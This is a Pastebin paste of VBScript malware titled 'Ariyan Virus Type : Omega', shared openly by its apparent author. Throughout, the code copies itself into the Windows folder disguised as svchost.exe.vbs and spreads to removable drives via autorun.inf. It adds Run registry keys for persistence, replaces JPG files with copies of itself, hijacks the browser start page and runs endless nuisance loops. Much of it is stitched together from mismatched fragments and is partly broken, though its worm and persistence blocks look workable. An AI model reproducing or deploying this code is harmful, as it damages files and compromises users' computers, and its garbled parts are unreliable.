AriyanXploit404

Ariyan Virus Type : Omega

Dec 31st, 2021 (edited)
541
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 13.56 KB | None | 0 0
  1. On error resume next
  2. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
  3. atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe svchost.exe.vbs”
  4. set fs = createobject(“Scripting.FileSystemObject”)
  5. set mf = fs.getfile(Wscript.ScriptFullname)
  6. dim text,size
  7. size = mf.size
  8. check = mf.drive.drivetype
  9. set text=mf.openastextstream(1,-2)
  10. do while not text.atendofstream
  11. mysource=mysource&text.readline
  12. mysource=mysource & vbcrlf
  13. loop
  14. do
  15. Set winpath = fs.getspecialfolder(0)
  16. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  17. tf.attributes = 32
  18. set tf=fs.createtextfile(winpath &\svchost.exe.vbs”,2,true)
  19. tf.write mysource
  20. tf.close
  21. set tf = fs.getfile(winpath &\svchost.exe.vbs”)
  22. tf.attributes = 39
  23. for each flashdrive in fs.drives
  24. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
  25. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  26. tf.attributes =32
  27. set tf=fs.createtextfile(flashdrive.path &\svchost.exe.vbs”,2,true)
  28. tf.write mysource
  29. tf.close
  30. set tf=fs.getfile(flashdrive.path &\svchost.exe.vbs”)
  31. tf.attributes =39
  32. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  33. tf.attributes = 32
  34. set tf=fs.createtextfile(flashdrive.path &\autorun.inf”,2,true)
  35. tf.write atr
  36. tf.close
  37. set tf =fs.getfile(flashdrive.path &\autorun.inf”)
  38. tf.attributes=39
  39. end if
  40. next
  41. set rg = createobject(“WScript.Shell”)
  42. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&\svchost.exe.vbs”
  43. rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
  44. rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3
  45. if check <> 1 then
  46. Wscript.sleep 100000
  47. end if
  48. loop while check<>1
  49. set sd = createobject(“Wscript.shell”)
  50. sd.run winpath&\explorer.exe /e,/select, “&Wscript.ScriptFullname
  51. reg add
  52. hkey_local_machine\software\microsoft\windows\currentversionrun\vWINDOWsAPI\t
  53. reg_sz/d c:windowswimn32.bat/f
  54. reg add
  55. hkey_current_user\software\microsoft\windows\currentversionrun\vCONTROLexit\t
  56. reg_sz/d c:windowswimn32.bat/f
  57. do while year(now) >= 2021
  58. WScript.sleep 20000
  59. next
  60. Sub serangan_jpg(target)
  61. on error resume next
  62. set ftarget=fso.GetFile(target)
  63. set fsource = fso.GetFile(Wscript.ScriptFullName)
  64. ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
  65. set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
  66. fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
  67. ftarget.Delete
  68. ftarget.Close
  69. fsource.Close
  70. End Sub
  71. Sub carifilejpg(folder)
  72. For Each filetarget in fso.GetFolder(folder).Files
  73. If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
  74. Next
  75. Sub serangan_drive()
  76. Set fso = CreateObject(”Scripting.FileSystemObject”)
  77. Set Drives=fso.drives
  78. adaflashdisk = False
  79. For Each drive in Drives
  80. If drive.isready Then
  81. fsource.Copy(drive & “” & “Ariyan.vbs”)
  82. If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
  83. End If
  84. Next
  85. If adaflashdisk = True Then
  86. set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
  87. fileautorun.WriteLine(”[AUTORUN]“)
  88. fileautorun.WriteLine(”RUN=Ariyan.vbs”)
  89. End If
  90. End Sub
  91. Sub serangan_ie()
  92. If (regedit.RegRead(”HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
  93. Page”)<>”c:windowssystem32wolio.html”) Then
  94. regedit.RegWrite “HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
  95. Page”,”c:windowssystem32wolio.html”
  96. End If
  97. End Sub
  98. next
  99. Sub buat_html()
  100. set filehtml = fso.CreateTextFile(”c:windowssystem32Ariyan.html”,True)
  101. filehtml.WriteLine(””)
  102. filehtml.WriteLine(””)
  103. filehtml.WriteLine(”Hacked By AriyanXploit404”)
  104. filehtml.WriteLine(””)
  105. filehtml.WriteLine(””)
  106. filehtml.WriteLine(””)
  107. filehtml.WriteLine(””)
  108. filehtml.WriteLine(””)
  109. filehtml.WriteLine(” Kemampuan Meretasku Diakui Karena Dendam Membara “)
  110. filehtml.WriteLine(””)
  111. filehtml.WriteLine(””)
  112. End Sub
  113. Sub serangan_folder(foldername)
  114. next
  115. dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
  116. filehtml, fileautorun
  117. dim adaflashdisk
  118. set fso = CreateObject(”Scripting.FileSystemObject”)
  119. set fsource = fso.GetFile(Wscript.ScriptFullName)
  120. set regedit=CreateObject(”WScript.Shell”)
  121. myfolder = Left(fsource,InStrRev(fsource,””))
  122. ‘ Copy-kan diri ke “c:windowssystem32″
  123. fsource.Copy(”c:windowssystem32wolio.vbs”)
  124. ‘ Cari dan infeksi file JPG didalam folder
  125. carifilejpg(myfolder)
  126. ‘ Copy-kan diri di sub folder yang ada
  127. serangan_folder(myfolder)
  128. ‘ Regitry
  129. if
  130. (regedit.RegRead(”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”)<>”c:windowssystem32Ariyan.vbs”) Then
  131. regedit.RegWrite
  132. “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunAriyan”,”c:windowssystem32Ariyan.vbs”
  133. End If
  134. ‘ Copy-kan diri ke semua drive aktif
  135. serangan_drive()
  136. ‘ Buat file Ariyan.html
  137. buat_html()
  138. ‘ Ubah Start Page di Internet Explorer
  139. serangan_ie()
  140. Set oWMP = CreateObject("WMPlayer.OCX.7")
  141. Set colCDROMs = oWMP.cdromCollection
  142. do
  143. if colCDROMs.Count >= 1 then
  144. For i = 0 to colCDROMs.Count - 1
  145. colCDROMs.Item(i).Eject
  146. Next
  147. For i = 0 to colCDROMs.Count - 1
  148. colCDROMs.Item(i).Eject
  149. Next
  150. End If
  151. wscript.sleep 5000
  152. loop
  153. End Sub
  154. next
  155. option explicit
  156. dim wshshell
  157. set wshshell=wscript.createobject(“wscript.shell”)
  158. dim x
  159. for x = 1 to 100000000
  160. wshshell.run “tourstart.exe”
  161. next
  162. End Sub
  163. next
  164. set wshshell = wscript.CreateObject("wScript.Shell")
  165. dim n
  166. for n = 1 to 100000000
  167. wshshell.run "Notepad"
  168. wscript.sleep 400
  169. wshshell.sendkeys "H"
  170. wscript.sleep 100
  171. wshshell.sendkeys "a"
  172. wscript.sleep 120
  173. wshshell.sendkeys "c"
  174. wscript.sleep 200
  175. wshshell.sendkeys "k"
  176. wscript.sleep 100
  177. wshshell.sendkeys "e"
  178. wscript.sleep 140
  179. wshshell.sendkeys "d"
  180. wscript.sleep 100
  181. wshshell.sendkeys " "
  182. wscript.sleep 50
  183. wshshell.sendkeys "B"
  184. wscript.sleep 120
  185. wshshell.sendkeys "y"
  186. wscript.sleep 170
  187. wshshell.sendkeys " "
  188. wscript.sleep 100
  189. wshshell.sendkeys "A"
  190. wscript.sleep 50
  191. wshshell.sendkeys "r"
  192. wscript.sleep 120
  193. wshshell.sendkeys "i"
  194. wscript.sleep 160
  195. wshshell.sendkeys "y"
  196. wscript.sleep 200
  197. wshshell.sendkeys "a"
  198. wscript.sleep 100
  199. wshshell.sendkeys "n"
  200. wscript.sleep 100
  201. wshshell.sendkeys "X"
  202. wscript.sleep 100
  203. wshshell.sendkeys "p"
  204. wscript.sleep 100
  205. wshshell.sendkeys "l"
  206. wscript.sleep 100
  207. wshshell.sendkeys "o"
  208. wscript.sleep 100
  209. wshshell.sendkeys "i"
  210. wscript.sleep 100
  211. wshshell.sendkeys "t"
  212. wscript.sleep 100
  213. wshshell.sendkeys "4"
  214. wscript.sleep 100
  215. wshshell.sendkeys "0"
  216. wscript.sleep 100
  217. wshshell.sendkeys "4"
  218. End If
  219. End Sub
  220. next
  221. set sd = createobject(“Wscript.shell”)
  222. sd.run winpath&\explorer.exe /e,/select, “&Wscript.ScriptFullname
  223. msgbox “Hacked By AriyanXploit404” & vbcrlf & _
  224. “Dunia Tersaji Diatas Piring Dan Kau Hanya Perlu Mengambilnya Saja” & vbcrlf & _
  225. “Virus Ariyan Tipe Omega” & vbcrlf & _
  226. “Virus Project Secret Dari AriyanXploit404” & vbcrlf & _
  227. vbcrlf & vbcrlf & _
  228. ” Namanya Baru Pemula Ya gitu deh Kan Berniat Jadi Legenda Xixixi >//w//<& vbcrlf & vbcrlf & _ “>//x//<
  229. %SystemRoot%\System32\notepad.exe
  230. Set wshShell = wscript.CreateObject(“WScript.Shell”)
  231. do
  232. wscript.sleep 100
  233. wshshell.sendkeys “HACKED BY ARIYANXPLOIT404”
  234. next
  235. Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname                                                                                                                                                                                            
  236. Set fs = createobject("Scripting.FileSystemObject")                                                                                                                                                                                                                          
  237. Set wn = WScript.CreateObject("WScript.Network")                                                                                                                                                                                                                              
  238. Set mf = fs.getfile(Wscript.ScriptFullname)                                                                                                                                                                                                                                  
  239. oldname=CStr(fs.getfilename(Wscript.ScriptFullname))                                                                                                                                                                                                                          
  240. newname = wn.ComputerName & ".vbs"                                                                                                                                                                                                                                            
  241. rgname = Replace(newname,".vbs","")                                                                                                                                                                                                                                          
  242. atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe Ariyan Virus Type : Omega.vbs"                                                                                                                                                                                                                
  243. dim text,size
  244. size = mf.size                                                                                                                                                                                                                                                                
  245. check = mf.drive.drivetype                                                                                                                                                                                                                                                    
  246. Set text=mf.openastextstream(1,-2)                                                                                                                                                                                                                                            
  247. do while not text.atendofstream
  248. mysource=mysource&text.readline                                                                                                                                                                                                                                              
  249. mysource=mysource & vbcrlf                                                                                                                                                                                                                                                    
  250. Loop                                                                                                                                                                                                                                                                          
  251. mysource=Replace(mysource,oldname,newname)                                                                                                                                                                                                                                    
  252. do
  253. Set winpath = fs.getspecialfolder(0)                                                                                                                                                                                                                                          
  254. Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)                                                                                                                                                                                                                        
  255. tf.attributes = 32
  256. Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)                                                                                                                                                                                                            
  257. tf.write mysource
  258. tf.close
  259. Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
  260. tf.attributes = 39
  261. For each flashdrive in fs.drives
  262. If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
  263. Set tf=fs.getfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs")
  264. tf.attributes =32
  265. Set tf=fs.createtextfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs",2,true)
  266. tf.write mysource
  267. tf.close
  268. Set tf=fs.getfile(flashdrive.path &"\Ariyan Virus Type : Omega.vbs")
  269. tf.attributes =39
  270. Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  271. tf.attributes = 32
  272. Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  273. tf.write atr
  274. tf.close
  275. Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  276. tf.attributes=39
  277. End If
  278. next
  279. Set rg = createobject("WScript.Shell")
  280. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
  281. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked By AriyanXploit404" & Replace(".vbs","")
  282. if check <> 1 then
  283. Wscript.sleep 120000
  284. End if
  285. loop while check<>1
  286. Set sd = createobject("Wscript.shell")
  287. sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  288. AriyanXploit404@love-machine:/media/disk$ cat autorun.inf
  289. shellexecute=wscript.exe Omega.vbsAriyanXploit404@love-machine:/media/disk$
Add Comment
Please, Sign In to add comment